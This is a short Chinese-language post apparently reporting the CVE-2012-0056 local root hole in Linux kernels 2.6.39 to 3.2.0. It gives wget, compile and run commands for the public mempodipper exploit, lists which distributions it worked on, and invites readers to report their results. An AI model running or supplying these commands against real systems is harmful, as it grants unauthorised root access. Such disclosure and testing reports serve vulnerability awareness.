Linux 2.6.39 到 3.2.0 爆提权漏洞

Linux 2.6.39 到 3.2.0 内核爆提权漏洞，普通用户可以通过运行特定代码获得 root 权限。

重现方法：

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

cc mempodipper.c

./a.out

在执行完毕后运行 whoami 来看是否执行成功。

已知发行版情况：

• Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker Report
• Fedora 16: 失败。内核 3.2.1-3.fc16.x86_64
• Arch Linux: 失败。内核 3.2.2-1-ARCH

如果你测试了，请将测试结果告诉我们！注意告诉我们发行版和 uname -a 的结果。

{ via }